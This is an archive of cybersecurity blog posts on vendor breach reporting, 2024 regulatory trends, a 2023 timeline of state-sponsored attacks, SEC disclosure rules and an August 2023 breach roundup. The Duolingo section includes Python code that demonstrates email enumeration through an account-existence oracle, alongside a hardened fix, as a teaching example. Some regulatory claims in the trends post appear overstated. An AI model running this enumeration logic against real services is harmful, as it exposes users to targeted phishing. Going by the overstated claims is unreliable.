Tag Archives: cybersecurity

Vendor Breach Reporting in the Modern Market


We have reached a point where data breaches are becoming more common and their repercussions more severe, which makes effective vendor breach reporting impossible to overlook. As companies rely more and more on third-party vendors for a variety of services, from cloud storage solutions to customer relationship management systems, the potential for data breaches originating from these vendors escalates. This blog will explore the current landscape of vendor breach reporting, highlighting the challenges, best practices, and the evolving regulatory environment that shapes how businesses respond to and report breaches.

Understanding the Landscape

The modern market is interconnected, with businesses routinely sharing sensitive information with vendors. This symbiotic relationship, however, introduces vulnerabilities. A breach at a vendor can have cascading effects, compromising the data integrity of all connected businesses. The 2023 Verizon Data Breach Investigations Report underscores this point, noting an uptick in incidents originating from third-party vendors.

Challenges in Vendor Breach Reporting

One of the primary challenges in vendor breach reporting is the detection and attribution of breaches. Identifying that a breach has occurred, and tracing it back to a specific vendor, requires sophisticated monitoring tools and a high degree of coordination between parties. Moreover, the variability in reporting requirements across jurisdictions adds a layer of complexity, making compliance a moving target for global businesses.

Best Practices for Effective Reporting

To navigate these challenges, businesses must adopt a proactive and comprehensive approach to vendor management and breach reporting. Key strategies include:

  • Due Diligence: Before entering into agreements with vendors, assess their security policies and incident response capabilities. Regular audits can ensure ongoing compliance with agreed-upon standards.

  • Transparent Communication: Establish clear lines of communication for reporting potential security incidents. This includes setting up contractual obligations for vendors to notify you immediately in the event of a breach.

  • Incident Response Planning: Develop a coordinated incident response plan that includes vendors. This plan should outline steps for breach investigation, notification, and mitigation, ensuring a swift and unified response.

  • Regulatory Compliance: Stay informed about the evolving regulatory landscape. Many regulations have set stringent requirements for data breach notification, including specific timelines and conditions under which breaches must be reported. Failure to comply can result in significant fines, legal fees, and damage to a company’s reputation.

The Evolving Regulatory Environment

Governments around the world are tightening regulations around data protection and breach notification. The trend is towards more stringent reporting requirements, with an emphasis on consumer protection. For instance, amendments to the GDPR and CCPA are pushing for shorter notification windows and greater transparency in the event of a breach. More recently, in 2024, the Federal Communications Commission (FCC) finalized new breach reporting rules that significantly tighten the requirements for telecommunications carriers in the US. These carriers now have only seven days to disclose data breaches. The rules expand the definition of a breach to include inadvertent access to or disclosure of customer information, which now encompasses not only Customer Proprietary Network Information (CPNI) but also personally identifiable information (PII) such as names, government ID numbers, biometric data, and email addresses/passwords. This change aims to cover a broader range of data and ensure customers are notified of breaches unless the carrier determines that no harm is reasonably likely to occur. The updated rules also require that, in addition to the FBI and U.S. Secret Service, the FCC be notified of breaches.

Lastly, the Federal Trade Commission (FTC) has introduced an amendment to its Safeguards Rule, imposing a 30-day deadline for non-banking financial organizations to report incidents involving 500 consumers or more. This amendment aims to bolster consumer data security by demanding comprehensive incident reports, driving stronger security practices in the financial sector.

Closing Thoughts:

In the modern market, effective vendor breach reporting is not just a regulatory requirement; it’s a critical component of a company’s overall cybersecurity strategy. By implementing best practices for vendor management and staying abreast of regulatory changes, businesses can better protect themselves and their customers from the fallout of data breaches. As the digital landscape continues to evolve, so too must the strategies for safeguarding against and responding to security incidents. The key to resilience in the face of these challenges lies in preparation, partnership, and proactive engagement with the issue of vendor breach reporting.


2024 Trends Unveiled: Cybersecurity as a Key Business Enabler

As 2024 unfolds, we are witnessing a revolutionary transformation in the cybersecurity landscape. No longer a mere aspect of IT, cybersecurity is now a pivotal driver in reshaping business operations on a global scale. This blog post delves into the forefront of cybersecurity compliance, highlighting pivotal regulations such as the ASEAN Guidelines on Consumer Impact Assessment (CIA), CMMC, PCI DSS 4.0, DORA, and SEC incident disclosure regulations. These emerging trends are rapidly becoming the gold standard in global business cybersecurity practices.


CMMC: Evolving from Defense to a Universal Cybersecurity Benchmark

  • The Cybersecurity Maturity Model Certification (CMMC) is evolving from its U.S. defense sector roots to a worldwide cybersecurity standard. Now applicable across various industries, CMMC’s layered cybersecurity approach is garnering universal acceptance. Its comprehensive framework, focused on continuous improvement, is especially vital for entities managing sensitive or critical data, signifying a move towards standardized cybersecurity excellence.

PCI DSS 4.0: Revolutionizing Payment Security Standards

  • PCI DSS 4.0 is revolutionizing payment security standards globally in 2024. This updated version introduces an adaptive, risk-based approach, essential for any business involved in digital transactions. Its flexibility and focus on tailored security measures are vital for e-commerce, financial institutions, and others in the payment ecosystem, making PCI DSS 4.0 compliance synonymous with secure and trustworthy payment processing.

DORA: Spearheading Digital Resilience in the Financial Sector

  • The Digital Operational Resilience Act (DORA) is a groundbreaking EU regulation shaping the financial sector’s approach to digital risks in 2024. Its influence extends globally, affecting financial entities interacting with the EU market. DORA emphasizes operational resilience, highlighting the need for robust digital risk management in today’s interconnected digital finance landscape.

SEC Incident Disclosure: Championing Transparency in Corporate Cybersecurity

  • The SEC’s incident disclosure regulations are leading a worldwide movement towards transparency in corporate cybersecurity. These mandates, which require prompt and detailed disclosure of cybersecurity incidents, are becoming critical for publicly traded companies globally. This shift towards transparency and accountability in cybersecurity reflects an increasing demand from investors and consumers for trustworthiness and integrity in corporate practices.

ASEAN CIA: Redefining Cybersecurity with a Consumer-Centric Approach

  • The ASEAN Guidelines on Consumer Impact Assessment, originating from Southeast Asia, are now setting a global precedent. These guidelines shift the focus towards assessing cybersecurity’s impact on consumers, prioritizing their rights and data privacy. This consumer-centric approach, especially critical for businesses in or targeting the ASEAN market, is now a global best practice. It underscores the imperative of balancing robust security with consumer rights, a notion gaining traction across various industries.

Other Regulatory Developments Shaping the Cybersecurity Domain

Additional global regulations also point to significant cybersecurity trends:

  • GDPR: Continues to influence data privacy and protection globally, impacting businesses handling EU citizens’ data.

  • ISO/IEC 27001: Gaining traction as a comprehensive framework for managing information security, key for organizations striving for global best practices.

  • NIST Framework: Increasingly adopted worldwide, indicating a move towards unified approaches in cybersecurity risk management.

Cybersecurity Compliance: A Strategic Business Advantage

In 2024, adherence to these emerging cybersecurity regulations offers businesses a strategic advantage. It transcends legal compliance, fostering trust, enhancing brand reputation, and providing a competitive edge. The integration of AI in cybersecurity is another emerging practice, offering efficient and effective solutions for meeting these standards.

  • Increased Focus on Supply Chain Attacks: Modern supply chains are interconnected and complex, making them susceptible to cyberattacks. A breach in one part can have a cascading effect, impacting multiple businesses. This emphasizes the need for rigorous cybersecurity measures across the entire supply chain.

  • Collaborative Risk Management: The trend towards collaborative defense strategies is based on the principle that sharing threat intelligence and best practices can strengthen the security posture of all involved parties. By learning from each other’s experiences, industries can develop more effective defenses against common threats.

State-Sponsored Cyber Attacks: An Escalating Concern

  • Global Ramifications: State-sponsored cyberattacks are particularly concerning due to their scale and impact. These attacks target critical infrastructure, such as energy grids or financial systems, and can compromise national security. The global nature of these threats requires an international response and cooperation.

  • Advanced Countermeasures: To combat these sophisticated threats, organizations need to implement advanced threat detection systems that can identify and neutralize attacks quickly. A zero-trust security model, where trust is never assumed and verification is required from everyone, can be crucial in mitigating these risks. Continuous monitoring ensures that any suspicious activity is detected and addressed promptly.

AI in Cybersecurity: A Complex Role

  • Enhanced Detection and Response: AI can significantly improve threat detection by analyzing vast amounts of data to identify patterns that may indicate a cyberattack. However, this technology can also be used by attackers to create more sophisticated threats, such as deepfakes or AI-driven phishing attacks.

  • Proactive Mitigation Strategies: Organizations must not only invest in AI-based defense systems but also ensure that their workforce is trained to recognize and respond to AI-generated threats. This includes understanding the limitations of AI and being able to identify when a human response is required.

Ransomware Evolution: The Changing Landscape of Cyber Extortion

  • Sophisticated Tactics: Modern ransomware attacks are more than just data encryption; attackers are now threatening to leak sensitive data if the ransom isn’t paid, adding an extra layer of coercion. This dual-threat approach makes it even more challenging for victims to decide whether to pay the ransom or risk public exposure of their data.

  • Comprehensive Defense Strategies: To protect against these evolving ransomware threats, organizations must have robust backup systems that can restore data with minimal loss. Employee training is crucial to help staff recognize and avoid potential ransomware attacks. Additionally, a well-prepared incident response plan can ensure quick action to mitigate damage if an attack occurs.

The Metaverse and Cloud Security: New Frontiers, New Risks

  • Expanded Attack Vectors: As businesses venture into new digital domains like the metaverse and cloud platforms, they face new cybersecurity challenges. These platforms can provide attackers with novel ways to exploit security vulnerabilities.

  • Proactive Security Measures: Ensuring security in these new environments involves a comprehensive approach that includes strong encryption to protect data, robust identity management to verify users, and regular security audits to identify and address vulnerabilities.

The Human Element: Bolstering the Frontlines of Cyber Defense

  • Empowering Through Training and Awareness: Regular and comprehensive training programs are essential in equipping employees with the necessary skills to recognize and prevent security breaches. This training should cover the latest cybersecurity threats and best practices.

  • Cultivating a Security-First Mindset: Creating a culture of security within the organization is crucial. This involves fostering an environment where employees are aware of the importance of cybersecurity and are motivated to take proactive steps to protect the organization’s digital assets.

As 2024 progresses, it’s clear that these cybersecurity trends and regulations are not just shaping, but redefining business strategies. From the consumer-centric ASEAN CIA guidelines to CMMC’s comprehensive security model, and the transparency demanded by SEC disclosure regulations, these developments are crucial in enabling businesses to thrive in the digital era. By staying ahead of these trends, companies can harness cybersecurity not only as a compliance requirement but as a cornerstone for growth and success. Understanding evolving regulations, embracing innovative technologies, and reinforcing human-centric defenses remain key to ensuring business resilience and triumph in an increasingly digitized world.

Analyzing the Rise of State Sponsored Cyber Attacks

Explore the global impact of state-sponsored cyber attacks through a detailed timeline of significant incidents since January 2023.

A Timeline & Global Impact of State-Sponsored Cyber Attacks:

State-sponsored cyber attacks have become an increasingly prevalent threat in recent years. These attacks are often carried out by nation-states seeking to gain an advantage over their geopolitical rivals, whether by stealing sensitive information or disrupting critical infrastructure. Analyzing the rise of state-sponsored cyber attacks is a complex task that requires a deep understanding of the geopolitical landscape and the motivations of nation-states.

It is important for governments and private organizations alike to invest in cybersecurity measures that can mitigate the risk of state-sponsored cyber attacks. This includes measures such as network segmentation, access controls, and regular security assessments.

Analyzing the Escalation of State-Sponsored Cyber Attacks:

The increasing prevalence of such attacks can be attributed to several factors. Firstly, the rapid digitization of essential infrastructure has amplified its susceptibility to cyber intrusions. Secondly, the emergence of sophisticated hacking collectives backed by nation-states has facilitated large-scale offensive cyber operations. Thirdly, the inherent anonymity of cyberspace impedes accountability, allowing malicious actors to operate with relative impunity. As actors increasingly target critical infrastructure, such attacks have doubled over the past two years, costing organizations an estimated $1.6 million per incident. The threat landscape is evolving, particularly with the integration of cyber warfare into geopolitical conflicts like the Russo-Ukrainian war.

Nation-state actors are well-funded and highly skilled, primarily targeting government, military, think tanks, universities, and critical infrastructure providers. The impact of state-sponsored cyber attacks extends even further, hitting various sectors, such as healthcare, telecommunications, and defense, causing financial losses and intellectual property theft. These attacks have also blurred the lines between APTs and cybercrime, with state-backed groups engaging in cybercriminal activities for profit.

Below I’ve outlined a timeline of notable cyber incidents that have unfolded since January 2023, focusing on attacks targeting government bodies, defense organizations, high-tech enterprises, and economic crimes resulting in losses exceeding a million dollars. In this rapidly evolving landscape of cyber warfare and data breaches, this timeline provides a glimpse into the persistent and evolving threats that shape the world we live in today. If you’re interested in reading all of these events since 2006, read on here.



Timeline of Significant Cyber Incidents in 2023:

  • January 2023:

    • CISA, the NSA, and the Multi-State Information Sharing and Analysis Center release a joint advisory warning of an increase in hacks on the federal civilian executive branch utilizing remote access software.

    • Russia-linked hackers deploy a ransomware attack against the UK postal service, the Royal Mail.

    • Iran-linked hackers execute ransomware attacks and exfiltrate data from U.S. public infrastructure and private Australian organizations.

    • Hackers use ransomware to encrypt 12 servers at Costa Rica’s Ministry of Public Works.

    • Albanian officials report that the country’s government servers were still near-daily targets of cyber-attacks after a major attack linked to Iranian hackers in 2022.

    • Hackers targeted Asia Pacific networks, using malware to access confidential data and capture audio from victim machines.

    • Malevolent actors distributed over a thousand emails with harmful links to government accounts in Moldova.

  • February 2023:

    • A pro-Russian hacker group claimed a DDoS attack on NATO networks, disrupting communications with earthquake relief airplanes at a Turkish airbase and temporarily disabling NATO’s sites.

    • A North Korean hacking group conducted a covert espionage campaign between August and November 2022, targeting various sectors and exfiltrating 100MB+ of data from each victim without detection. The group is linked to the North Korean government.

    • Latvian officials claim that Russian hackers launched a phishing campaign against its Ministry of Defense.

    • Iranian hacktivists claim responsibility for taking down websites for the Bahrain international airport and state news agency.

    • In a ransomware attack on Technion University, Israel’s leading technology education program, hackers demanded 80 bitcoin (equivalent to $1.7 million USD) to decrypt the university’s files. Israeli cybersecurity authorities attributed the attack to Iranian state-sponsored hackers.

    • Hackers disabled Italy’s Revenue Agency website and sent phishing emails to users, leading them to a fake login page resembling the official site.

    • Chinese cyberespionage hackers perform a spear-phishing campaign against government and public sector organizations in Asia and Europe. The emails

  • March 2023:

    • Russian hackers bring down the French National Assembly’s website using a DDoS attack.

    • CISA and FBI revealed that a U.S. federal agency was subjected to a cyberespionage campaign between November 2022 and January 2023. The hackers exploited a vulnerability in the agency’s Microsoft Internet Information Services (IIS) server to implant malware.

    • South Asian hacking group targets firms in China’s nuclear energy industry.

    • North Korean hackers target U.S.-based cybersecurity research firms.

    • Chinese cyber espionage group targets government entities in Vietnam, Thailand, and Indonesia.

    • Russian hackers launch social engineering campaigns targeting U.S. and European politicians, businesspeople, and celebrities.

    • Slovakian cybersecurity researchers discover a new exploit from a Chinese espionage group targeting political organizations in Taiwan and Ukraine.

    • Poland blames Russian hackers for a DDoS attack on its official tax service website.

  • April 2023:

    • Sudan-linked hackers conduct a DDoS attack on Israel’s Independence Day.

    • NSA cyber authorities report evidence of Russian ransomware and supply chain attacks against Ukraine and other European countries.

    • Iranian state-linked hackers target critical infrastructure in the U.S. and other countries.

    • Recorded Future releases a report revealing data exfiltration attacks against South Korean research and academic institutions.

    • Chinese hackers target telecommunication services providers in Africa.

    • Russia-linked threat group launches a DDoS attack against Canadian Prime Minister Justin Trudeau.

    • North Korea-linked hackers shift focus to espionage targeting defense industry firms in Eastern Europe and Africa.

    • Ukraine-linked hacktivists target the email of the leader of Russian GRU Unit 26165.

  • May 2023:

    • Belgium’s cyber security agency links China-sponsored hackers to a spear-phishing attack on a prominent politician.

    • Chinese hackers breach communications networks at a U.S. outpost in Guam.

    • Chinese hackers target Kenyan government ministries and state institutions.

    • Russia-linked hackers target government organizations in Central Asia.

    • An unidentified group hacks targets in both Russia and Ukraine for surveillance and data gathering.

  • June 2023:

    • A group allegedly tied to the private military corporation Wagner hacks a Russian satellite telecommunications provider.

    • A Pakistan-based hacker group infiltrates the Indian army and education sector.

    • Pro-Russian hacktivists attack European banking institutions, including the European Investment Bank.

    • U.S. federal government agencies, including Department of Energy entities, are breached in a global cyberattack by Russia-linked hackers.

    • Illinois hospital closes due to a ransomware attack.

    • Pro-Russian hackers target Swiss government websites, including those for Parliament and the federal administration.

    • North Korean hackers impersonate tech workers to steal funds for the country’s ballistic missile program.

    • Ukrainian hackers attack a Russian telecom firm providing critical infrastructure to the Russian banking system.

    • Russia’s Federal Security Service alleges Apple worked with US intelligence agencies to hack iPhones belonging to Russian users and foreign diplomats.

  • July 2023:

    • China claims an earthquake monitoring system in Wuhan was hacked by U.S. cybercriminals.

    • Kenyan eCitizen service disrupted by pro-Russian cybercriminals.

    • Russian-linked hackers target Ukrainian state services like the app “Diia.”

    • DDoS attack on the Ministry of Justice in Trinidad and Tobago disrupts court operations.

    • New Zealand’s parliament hit by a cyberattack from a Russian hacking group.

    • Russian hackers target twelve government ministries in Norway to gain access to sensitive information.

    • A South Korean government-affiliated institution falls victim to a phishing scandal.

    • Chinese-linked hackers infect a Pakistani government app with malware.

    • Chinese hackers breach emails of several prominent U.S. government employees.

    • Russian hackers target attendees of the latest NATO Summit in Vilnius.

    • Polish diplomat’s advertisement corrupted by Russian hackers to target Ukrainian diplomats.

  • August 2023:

    • Russian hacktivists launch DDoS attacks on Czech banks and the stock exchange, demanding they stop supporting Ukraine.

    • Unnamed hackers take down X (formerly Twitter) in several countries, demanding Starlink be opened in Sudan.

    • Cybercriminals sell a stolen dataset from China’s Ministry of State Security, compromising personal information for half a billion Chinese citizens.

    • Russian hacktivists launch DDoS attacks on Polish government websites, the Warsaw Stock Exchange, and Polish national banks.

    • Russian hackers disable Poland’s rail systems and transmit propaganda during the attack.

    • Chinese hackers target a U.S. military procurement system and Taiwan-based organizations.

    • Ukrainian hackers breach a senior Russian politician’s email and leak sensitive documents connecting him to illegal activities.

    • Ecuador’s national election agency faces cyberattacks during the latest election.

    • Suspected North Korean hackers attempt to compromise a joint U.S.-South Korean military exercise.

    • Bangladesh shuts down central bank and election commission websites to prevent cyberattacks.

    • Belarusian hackers target foreign embassies with disguised malware.

    • Chinese hackers obtain personal and political emails of a U.S. Congressman.

    • Iranian cyber spies target dissidents in Germany using false digital personas and credential harvesting.

    • Ukrainian hackers uncover Russian attempts to deploy custom malware against Starlink satellites.

    • Russian hackers launch a ransomware attack against a Canadian government service provider.

    • Canadian politician targeted by a Chinese disinformation campaign on WeChat.

    • Canadian government accuses a highly sophisticated Chinese state-sponsored actor of hacking a federal scientific research agency.

    • Russia’s military intelligence service attempts to hack Ukrainian Armed Forces’ combat information systems.

    • Russian hackers breach the UK’s Electoral Commission network.

    • North Korean hackers breach a Russian missile developer’s computer system.



The diverse array of targets, from critical infrastructures to government bodies, reveals a tumultuous digital landscape. To fortify our digital defenses against the onslaught of nation-state cyber activities, it is crucial that we advance technological innovation, foster international cooperation, and cultivate a culture of cybersecurity awareness.

The SEC’s New Cyber Rules


What Every Public Company CISO Must Know:

The role of a Chief Information Security Officer (CISO) in public companies has never been more pivotal. With cyber threats escalating in scale and sophistication, the Securities and Exchange Commission (SEC) has rolled out new cyber regulations aimed at safeguarding investors, stakeholders, and the broader market. Given that the amendments took effect on September 5, 2023, it’s crucial for your organization to be informed. While the final rules are quite lengthy, I’ll offer a condensed and digestible version in this blog post to help you understand the key points – so make sure to read on!

The Backdrop:

Back in March 2022, the Commission took the bold step of introducing a suite of regulations. The intent was clear: fortify public company disclosures concerning cybersecurity. This encompassed key areas such as cyber threats, strategic countermeasures, governance structures, and insights into major cyber incidents.

At the time, several major trends led the Commission to take this action. The digital evolution and massive work-from-home shifts, intertwined with the allure of cybercrime monetization and an overarching reliance on third-party tech services like cloud platforms, have stretched the boundaries of cyber risk. The financial fallout from cyber incidents has also skyrocketed. Given all of this, the Commission’s move to ensure transparency isn’t just timely; it’s imperative.

Though the Commission offered guidance in 2011 and 2018, the standards remained inconsistent. The 2022 regulations were introduced to bring consistency and offer investors clearer insights.

Key Mandates To Be Aware Of:

Skip ahead to 2023, and the SEC’s proposed rules have officially transformed into finalized rules. Here are the essential highlights you should be aware of…

  1. Form 8-K Item 1.05: A pivotal element in the new regulations. Public companies now have the duty to report significant cyber incidents. Reports must “describe the material aspects of the nature, scope, and timing of the incident, as well as the material impact or reasonably likely material impact of the incident on the registrant, including its financial condition and results of operations.”

  2. Disclosure Timeline: After a cyber event, companies need to swiftly gauge its significance. If it is found to be material, a Form 8-K needs to be filed within four business days. However, exceptions do exist. Should the U.S. Attorney General deem a quick disclosure a threat to national or public safety, the filing can be delayed.

  3. Regulation S-K Item 106: This regulation delves deep. It mandates firms to shed light on their cyber threat assessment, detection, and management strategies. Past incidents that have or might have considerable ramifications also need to be outlined. Plus, it casts the spotlight on how involved the board is in overseeing cyber risks and the prowess of the management in mitigating them.

  4. International Disclosures: The SEC is highlighting that global transparency is crucial. Modifications to Form 6-K and Form 20-F ensure that foreign private entities aren’t left out. Significant cyber events disclosed overseas or required by foreign issuers need to be detailed.

What Lies Ahead:

The new regulations will be operational a month after their Federal Register appearance. For companies, the compliance timelines are split based on the form:

  • Regulation S-K Item 106 & Form 20-F: Disclosure starts with annual statements for fiscal years ending on or after December 15, 2023.

  • Form 8-K Item 1.05 & Form 6-K: Compliance starts 90 days post Federal Register publication or by December 18, 2023, except for smaller firms. They have until June 15, 2024.

  • Finally, when it comes to structured data mandates, the spotlight is on Inline XBRL. The final rules require the cybersecurity disclosures to be presented in Inline eXtensible Business Reporting Language. Entities must tag their disclosures using this format beginning one year after their initial disclosure duties kick off. For those who may not be aware, Inline XBRL is a markup format that lets a single document be both human-readable and machine-readable. So, instead of making two different documents (one for people to read and one for computers to understand), you just make one using Inline XBRL.
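To make the "one document, two readers" point concrete, here is an added example (not from this post, and not the SEC's own tooling) that parses a small constructed Inline XBRL fragment: the same XHTML yields prose for a person and tagged facts for a machine. The `example:` concept names, the CIK and the record count are hypothetical placeholders, not the SEC's actual cybersecurity taxonomy.

```python
"""Extract machine-readable facts and human-readable text from an Inline XBRL
(iXBRL) XHTML document. Added example; the concept names under the "example:"
prefix are placeholders, not a real taxonomy."""
import xml.etree.ElementTree as ET

NS = {
    "xhtml": "http://www.w3.org/1999/xhtml",
    "ix": "http://www.xbrl.org/2013/inlineXBRL",
    "xbrli": "http://www.xbrl.org/2003/instance",
}
IX_NONNUMERIC = f"{{{NS['ix']}}}nonNumeric"
IX_NONFRACTION = f"{{{NS['ix']}}}nonFraction"
IX_HEADER = f"{{{NS['ix']}}}header"

# Constructed sample: an 8-K style Item 1.05 disclosure with a hidden ix:header
# carrying the context (period) and unit that the tagged facts refer to.
SAMPLE_IXBRL = """<html xmlns="http://www.w3.org/1999/xhtml"
      xmlns:ix="http://www.xbrl.org/2013/inlineXBRL"
      xmlns:ixt="http://www.xbrl.org/inlineXBRL/transformation/2015-02-26"
      xmlns:xbrli="http://www.xbrl.org/2003/instance">
<body>
  <div style="display:none">
    <ix:header>
      <ix:resources>
        <xbrli:context id="c1">
          <xbrli:entity>
            <xbrli:identifier scheme="http://www.sec.gov/CIK">0000000000</xbrli:identifier>
          </xbrli:entity>
          <xbrli:period><xbrli:instant>2023-08-03</xbrli:instant></xbrli:period>
        </xbrli:context>
        <xbrli:unit id="pure"><xbrli:measure>xbrli:pure</xbrli:measure></xbrli:unit>
      </ix:resources>
    </ix:header>
  </div>
  <h2>Item 1.05 Material Cybersecurity Incidents</h2>
  <p><ix:nonNumeric name="example:IncidentNatureDescription" contextRef="c1">On
    August 3, 2023 the registrant identified unauthorized access to customer
    records hosted by a third-party vendor.</ix:nonNumeric>
    <ix:nonNumeric name="example:IncidentMaterialImpactDescription" contextRef="c1">
    Remediation and notification costs are not expected to be material to the
    registrant's results of operations.</ix:nonNumeric></p>
  <p>Records affected: <ix:nonFraction name="example:AffectedRecordCount"
    contextRef="c1" unitRef="pure" decimals="0"
    format="ixt:num-dot-decimal">12,400</ix:nonFraction></p>
</body>
</html>"""


def _text(el):
    """Collapse the element's text (including nested markup) to one line."""
    return " ".join("".join(el.itertext()).split())


def _numeric_value(el):
    """Turn a displayed ix:nonFraction into a number (scale and sign applied).
    Only the num-dot-decimal transform is implemented; the real ixt registry
    defines many more display formats."""
    raw = _text(el)
    if el.get("format", "").endswith("num-dot-decimal"):
        raw = raw.replace(",", "")
    value = float(raw) * (10 ** int(el.get("scale", "0")))
    if el.get("sign") == "-":
        value = -value
    return int(value) if value.is_integer() else value


def extract_contexts(root):
    """Map context id -> period instant date from the hidden ix:header."""
    periods = {}
    for ctx in root.iter(f"{{{NS['xbrli']}}}context"):
        instant = ctx.find("xbrli:period/xbrli:instant", NS)
        periods[ctx.get("id")] = instant.text if instant is not None else None
    return periods


def extract_facts(xhtml):
    """The machine view: every tagged fact in document order."""
    root = ET.fromstring(xhtml)
    periods = extract_contexts(root)
    facts = []
    for el in root.iter():
        if el.tag not in (IX_NONNUMERIC, IX_NONFRACTION):
            continue
        facts.append({
            "concept": el.get("name"),
            "context": el.get("contextRef"),
            "period": periods.get(el.get("contextRef")),
            "unit": el.get("unitRef"),
            "value": _numeric_value(el) if el.tag == IX_NONFRACTION else _text(el),
        })
    return facts


def human_text(xhtml):
    """The reader view: body prose with the hidden ix:header dropped."""
    root = ET.fromstring(xhtml)
    for parent in list(root.iter()):
        for child in list(parent):
            if child.tag == IX_HEADER:
                parent.remove(child)
    return _text(root.find("xhtml:body", NS))


if __name__ == "__main__":
    for fact in extract_facts(SAMPLE_IXBRL):
        print(fact)
    print(human_text(SAMPLE_IXBRL))
```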

Every day we are reminded how crucial cyber resilience is. For CISOs in public companies, aligning with the SEC’s updated cyber regulations is not just about compliance—it’s a commitment to transparency, investor protection, and long-term business sustainability.



August Data Breach And Security Round Up


August may be known for summer vacations and relaxing by the beach, but in the world of hackers, it was a month of action-packed cyber escapades. As the digital realm grows, so does the audacity of those who breach the walls of data security. In this blog post, I will take you through the breaches that unfolded in the hot days of August. From electric cars to language learning apps, we’ve got it all covered. Let’s dive in.

Tesla:

Tesla recently attributed a data breach affecting over 75,000 of its employees to insider misconduct, according to an official statement. The electric vehicle manufacturer, headed by Elon Musk, stated in a data breach report submitted to Maine’s Attorney General that a thorough investigation determined two former employees had disclosed personal information belonging to more than 75,000 individuals to a foreign media organization.

Tesla’s data privacy officer, Steven Elentukh, stated in the report that “the investigation uncovered that two former Tesla employees wrongfully obtained and shared this information, contravening Tesla’s IT security and data protection protocols by providing it to the media outlet.”

The sensitive data included personally identifiable details such as names, addresses, contact numbers, employment records, and Social Security numbers of 75,735 past and current Tesla employees. The report also revealed that the two ex-employees had transmitted this data to the German newspaper Handelsblatt, which assured Tesla it would refrain from publishing the information and adhere to legal restrictions concerning its use.

In May, Handelsblatt had previously reported a significant breach at Tesla, disclosing various internal documents, known as the “Tesla Files,” totaling 100 gigabytes of confidential information. These documents included employee personal data, customer banking information, proprietary production details, and customer grievances regarding Tesla’s Full Self-Driving (FSD) functionalities. Remarkably, the leak even contained Elon Musk’s Social Security number.

Tesla responded by initiating legal action against the individuals believed to be responsible for the data breach, leading to the confiscation of their electronic devices. Additionally, the company obtained court orders to prevent these former employees from further accessing, sharing, or using the data, with potential criminal consequences for violations.

This incident follows a previous report in April by Reuters, which revealed that Tesla employees had shared sensitive images recorded by customer vehicles, including invasive pictures and videos captured by car cameras, over the period from 2019 to 2022.

Duolingo:

In January 2023, data on 2.6 million Duolingo users was offered on a hacking forum; it resurfaced in August 2023 when it was posted for a nominal price, and it gives attackers ready material for targeted phishing. The dataset pairs public profile fields (login names and real names) with non-public ones, including email addresses and internal data about each account, that can be exploited in follow-on attacks.

The data was scraped through an exposed application programming interface (API) that had been shared openly since at least March 2023, with researchers posting on social media and public platforms about how easy it was to query. The API lets anyone submit a username and receive JSON containing that user's publicly accessible profile data. More importantly, it also accepts an email address and reveals whether that address is associated with a valid Duolingo account, which turns it into an account-existence oracle.
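To make the oracle concrete, here is an added example (written for this post, not Duolingo's code; it models the flaw generically with hypothetical handlers and constructed sample accounts): a vulnerable lookup that accepts an email and answers differently when it is registered, next to a hardened version that refuses emails as a lookup key, never returns the email in a public profile, answers email-driven flows identically for any address, and rate-limits each client. The `enumerate_via` function shows the attacker's side: it confirms an address whenever the API's answer for it differs from the answer for an address that certainly does not exist.

```python
"""Account-existence oracle: a vulnerable lookup endpoint beside a hardened one.

Hypothetical handlers written for this post; they model the flaw generically
and are not Duolingo's API. The user records are constructed sample data.
"""
import time
from collections import defaultdict
from typing import Callable, Iterable

USERS = {  # constructed sample accounts
    "alice": {"email": "alice@example.com", "name": "Alice Example"},
    "bob": {"email": "bob@example.net", "name": "Bob Sample"},
}
EMAIL_INDEX = {u["email"]: name for name, u in USERS.items()}
CANDIDATES = ["alice@example.com", "carol@example.org"]  # attacker's guess list


def vulnerable_lookup(query: str) -> dict:
    """Accepts a username OR an email and answers differently depending on whether
    a matching account exists. The 200-vs-404 difference is the oracle; the 200
    body also leaks the email, which is what made the scraped dataset valuable."""
    if "@" in query:
        username = EMAIL_INDEX.get(query)
        if username is None:
            return {"status": 404, "body": {"error": "no such account"}}
        return {"status": 200, "body": {"username": username, "name": USERS[username]["name"]}}
    user = USERS.get(query)
    if user is None:
        return {"status": 404, "body": {"error": "no such account"}}
    return {"status": 200, "body": {"username": query, "name": user["name"], "email": user["email"]}}


class RateLimiter:
    """Fixed-window limiter: at most `limit` requests per `window` seconds per client.
    `clock` is injectable so the behaviour can be tested deterministically."""

    def __init__(self, limit: int, window: float, clock: Callable[[], float] = time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self._hits: dict[str, list[float]] = defaultdict(list)

    def allow(self, client_id: str) -> bool:
        now = self.clock()
        recent = [t for t in self._hits[client_id] if now - t < self.window]
        allowed = len(recent) < self.limit
        if allowed:
            recent.append(now)
        self._hits[client_id] = recent
        return allowed


class HardenedAPI:
    """Three changes: emails are never accepted as a lookup key, public profiles never
    include the email, and email-driven flows answer identically for any address."""

    RESET_REPLY = {"status": 202, "body": {"message": "If that address is registered, a reset link has been sent."}}
    THROTTLED = {"status": 429, "body": {"error": "too many requests"}}

    def __init__(self, limiter: RateLimiter):
        self.limiter = limiter

    def public_profile(self, client_id: str, username: str) -> dict:
        if not self.limiter.allow(client_id):
            return self.THROTTLED
        if "@" in username:
            return {"status": 400, "body": {"error": "username required"}}
        user = USERS.get(username)
        if user is None:
            return {"status": 404, "body": {"error": "no such account"}}  # usernames are public anyway
        return {"status": 200, "body": {"username": username, "name": user["name"]}}  # no email field

    def request_password_reset(self, client_id: str, email: str) -> dict:
        if not self.limiter.allow(client_id):
            return self.THROTTLED
        if email in EMAIL_INDEX:
            pass  # send the reset mail out of band; nothing about it reaches the HTTP response
        return self.RESET_REPLY


def enumerate_via(probe: Callable[[str], dict], candidates: Iterable[str]) -> set[str]:
    """Attacker's view: an address is 'confirmed' when the API answers it differently
    from an address that certainly is not registered."""
    baseline = probe("nobody@example.invalid")
    return {email for email in candidates if probe(email) != baseline}


if __name__ == "__main__":
    print("vulnerable:", enumerate_via(vulnerable_lookup, CANDIDATES))
    api = HardenedAPI(RateLimiter(limit=100, window=60.0))
    print("hardened reset flow:", enumerate_via(lambda e: api.request_password_reset("c1", e), CANDIDATES))
    print("hardened profile:", enumerate_via(lambda e: api.public_profile("c1", e), CANDIDATES))
```

Against the vulnerable handler the attacker confirms alice@example.com; against the hardened endpoints every candidate gets the same answer as the baseline, so nothing is confirmed. Rate limiting alone would not have closed the hole (scraping 2.6 million profiles would just take longer); removing the email oracle does.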

